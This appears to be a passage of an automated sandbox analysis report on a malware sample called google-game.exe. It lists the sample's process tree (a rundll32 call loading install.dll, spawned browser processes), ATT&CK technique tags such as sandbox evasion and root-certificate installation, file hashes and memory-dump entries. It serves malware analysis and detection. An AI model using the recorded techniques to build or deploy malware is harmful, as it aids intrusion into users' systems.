C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe"C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe"1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6960 -s 12242⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
Virtualization/Sandbox Evasion
1Modify Registry
4BITS Jobs
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
c304cb13aabe1b257297afda703af1b8
SHA1d3e774717e52323ef559d5538914212f09258e88
SHA2565965406efddfec70ff6e189edec5b5544dc694e3f26be70a89810303a161a619
SHA512252fb1a974e42eebcf1ab29cf3cdbd37f66e6e60f5a5da471ec076c4226431a0409add5f96dd65837fa7fc6b1a7532874a1da18c5dd82398a1b9fdf93971cd7b
-
\??\pipe\crashpad_3680_YXGDYDQBCPKWFRVYMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\crashpad_5048_NQOSDZZEMEXJKSGXMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/68-249-0x000001F928680000-0x000001F9286F2000-memory.dmpFilesize
456KB
-
memory/184-243-0x0000000000000000-mapping.dmp
-
memory/188-122-0x0000000000000000-mapping.dmp
-
memory/404-126-0x0000000000000000-mapping.dmp
-
memory/576-288-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/684-276-0x000001AEBB140000-0x000001AEBB1B2000-memory.dmpFilesize
456KB
-
memory/744-204-0x0000000000000000-mapping.dmp
-
memory/804-116-0x0000000000000000-mapping.dmp
-
memory/904-251-0x0000000004FC0000-0x000000000501D000-memory.dmpFilesize
372KB
-
memory/904-245-0x0000000004EC0000-0x0000000004FC0000-memory.dmpFilesize
1024KB
-
memory/1080-256-0x000001FF31200000-0x000001FF31272000-memory.dmpFilesize
456KB
-
memory/1188-264-0x000001E98CE40000-0x000001E98CEB2000-memory.dmpFilesize
456KB
-
memory/1244-265-0x0000023801620000-0x0000023801692000-memory.dmpFilesize
456KB
-
memory/1288-293-0x0000000002D80000-0x0000000002D82000-memory.dmpFilesize
8KB
-
memory/1288-298-0x0000000002D84000-0x0000000002D85000-memory.dmpFilesize
4KB
-
memory/1288-295-0x0000000002D82000-0x0000000002D84000-memory.dmpFilesize
8KB
-
memory/1300-211-0x0000000000000000-mapping.dmp
-
memory/1368-258-0x000002668DB90000-0x000002668DC02000-memory.dmpFilesize
456KB
-
memory/1416-149-0x0000000000000000-mapping.dmp
-
memory/1508-232-0x0000000000000000-mapping.dmp
-
memory/1508-289-0x0000000002AD0000-0x0000000002AD2000-memory.dmpFilesize
8KB
-
memory/1580-247-0x0000000002B10000-0x0000000002CAC000-memory.dmpFilesize
1.6MB
-
memory/1788-261-0x00000230EEE40000-0x00000230EEEB2000-memory.dmpFilesize
456KB
-
memory/2096-290-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/2108-212-0x0000000000000000-mapping.dmp
-
memory/2152-208-0x0000000000000000-mapping.dmp
-
memory/2172-231-0x0000000000000000-mapping.dmp
-
memory/2208-306-0x0000000004850000-0x0000000004D4E000-memory.dmpFilesize
5.0MB
-
memory/2252-214-0x0000000000000000-mapping.dmp
-
memory/2272-239-0x0000000000000000-mapping.dmp
-
memory/2328-275-0x000001C9CFF80000-0x000001C9CFFF2000-memory.dmpFilesize
456KB
-
memory/2336-253-0x00000243EBC80000-0x00000243EBCF2000-memory.dmpFilesize
456KB
-
memory/2352-278-0x0000000005190000-0x0000000005191000-memory.dmpFilesize
4KB
-
memory/2380-132-0x0000000000000000-mapping.dmp
-
memory/2556-273-0x000001A736000000-0x000001A736072000-memory.dmpFilesize
456KB
-
memory/2640-268-0x0000015D8D500000-0x0000015D8D572000-memory.dmpFilesize
456KB
-
memory/2656-270-0x000001CB60280000-0x000001CB602F2000-memory.dmpFilesize
456KB
-
memory/2676-282-0x0000000004FE0000-0x0000000004FE1000-memory.dmpFilesize
4KB
-
memory/3300-308-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/3328-246-0x000001E0DAE50000-0x000001E0DAE9B000-memory.dmpFilesize
300KB
-
memory/3328-259-0x000001E0DAF10000-0x000001E0DAF82000-memory.dmpFilesize
456KB
-
memory/3672-279-0x0000000004E70000-0x0000000004E71000-memory.dmpFilesize
4KB
-
memory/3716-213-0x0000000000000000-mapping.dmp
-
memory/3756-154-0x0000000000000000-mapping.dmp
-
memory/3784-250-0x000000001BA00000-0x000000001BA02000-memory.dmpFilesize
8KB
-
memory/3960-241-0x0000000000000000-mapping.dmp
-
memory/3968-140-0x0000000000000000-mapping.dmp
-
memory/3972-291-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/3996-121-0x0000000000000000-mapping.dmp
-
memory/3996-125-0x00007FF89A0D0000-0x00007FF89A0D1000-memory.dmpFilesize
4KB
-
memory/4000-145-0x0000000000000000-mapping.dmp
-
memory/4000-244-0x0000000000000000-mapping.dmp
-
memory/4012-162-0x0000000000000000-mapping.dmp
-
memory/4124-234-0x0000000000000000-mapping.dmp
-
memory/4124-205-0x0000000000000000-mapping.dmp
-
memory/4232-237-0x0000000000000000-mapping.dmp
-
memory/4276-283-0x0000000010000000-0x0000000010145000-memory.dmpFilesize
1.3MB
-
memory/4276-277-0x00000000050D0000-0x000000000520F000-memory.dmpFilesize
1.2MB
-
memory/4292-238-0x0000000000000000-mapping.dmp
-
memory/4300-296-0x0000000001052000-0x0000000001054000-memory.dmpFilesize
8KB
-
memory/4300-294-0x0000000001050000-0x0000000001052000-memory.dmpFilesize
8KB
-
memory/4300-297-0x0000000001054000-0x0000000001055000-memory.dmpFilesize
4KB
-
memory/4300-299-0x0000000001055000-0x0000000001057000-memory.dmpFilesize
8KB
-
memory/4308-206-0x0000000000000000-mapping.dmp
-
memory/4364-207-0x0000000000000000-mapping.dmp
-
memory/4396-177-0x0000000000000000-mapping.dmp
-
memory/4400-292-0x0000000001340000-0x0000000001342000-memory.dmpFilesize
8KB
-
memory/4408-209-0x0000000000000000-mapping.dmp
-
memory/4428-227-0x0000000000000000-mapping.dmp
-
memory/4468-303-0x0000000002C20000-0x0000000002CCE000-memory.dmpFilesize
696KB
-
memory/4472-287-0x0000000000400000-0x000000000042B000-memory.dmpFilesize
172KB
-
memory/4496-233-0x0000000000000000-mapping.dmp
-
memory/4516-272-0x000001EFF2E30000-0x000001EFF2EA2000-memory.dmpFilesize
456KB
-
memory/4540-218-0x0000000000000000-mapping.dmp
-
memory/4544-281-0x0000000000400000-0x0000000002BEA000-memory.dmpFilesize
39.9MB
-
memory/4544-280-0x0000000002CA0000-0x0000000002D4E000-memory.dmpFilesize
696KB
-
memory/4552-217-0x0000000000000000-mapping.dmp
-
memory/4580-181-0x0000000000000000-mapping.dmp
-
memory/4588-210-0x0000000000000000-mapping.dmp
-
memory/4608-226-0x0000000000000000-mapping.dmp
-
memory/4628-236-0x0000000000000000-mapping.dmp
-
memory/4688-216-0x0000000000000000-mapping.dmp
-
memory/4716-185-0x0000000000000000-mapping.dmp
-
memory/4716-228-0x0000000000000000-mapping.dmp
-
memory/4728-215-0x0000000000000000-mapping.dmp
-
memory/4760-240-0x0000000000000000-mapping.dmp
-
memory/4768-190-0x0000000000000000-mapping.dmp
-
memory/4780-235-0x0000000000000000-mapping.dmp
-
memory/4800-219-0x0000000000000000-mapping.dmp
-
memory/4820-225-0x0000000000000000-mapping.dmp
-
memory/4820-194-0x0000000000000000-mapping.dmp
-
memory/4832-300-0x00000000037A0000-0x00000000037E8000-memory.dmpFilesize
288KB
-
memory/4836-223-0x0000000000000000-mapping.dmp
-
memory/4856-195-0x0000000000000000-mapping.dmp
-
memory/4856-220-0x0000000000000000-mapping.dmp
-
memory/4864-229-0x0000000000000000-mapping.dmp
-
memory/4892-196-0x0000000000000000-mapping.dmp
-
memory/4904-222-0x0000000000000000-mapping.dmp
-
memory/4904-197-0x0000000000000000-mapping.dmp
-
memory/4956-221-0x0000000000000000-mapping.dmp
-
memory/4964-198-0x0000000000000000-mapping.dmp
-
memory/4976-199-0x0000000000000000-mapping.dmp
-
memory/5020-307-0x0000000000400000-0x000000000040A000-memory.dmpFilesize
40KB
-
memory/5028-224-0x0000000000000000-mapping.dmp
-
memory/5036-200-0x0000000000000000-mapping.dmp
-
memory/5036-242-0x0000000000000000-mapping.dmp
-
memory/5044-230-0x0000000000000000-mapping.dmp
-
memory/5048-201-0x0000000000000000-mapping.dmp
-
memory/5092-202-0x0000000000000000-mapping.dmp
-
memory/5100-284-0x0000026BDDF40000-0x0000026BDDF8B000-memory.dmpFilesize
300KB
-
memory/5100-286-0x0000026BE0800000-0x0000026BE0905000-memory.dmpFilesize
1.0MB
-
memory/5100-285-0x0000026BDE040000-0x0000026BDE0B2000-memory.dmpFilesize
456KB
-
memory/5460-301-0x0000000140000000-0x0000000140383000-memory.dmpFilesize
3.5MB
-
memory/5636-302-0x0000000140000000-0x000000014070A000-memory.dmpFilesize
7.0MB
-
memory/5636-305-0x000001BF67BA0000-0x000001BF67BC0000-memory.dmpFilesize
128KB
-
memory/5948-304-0x0000000000400000-0x0000000000447000-memory.dmpFilesize
284KB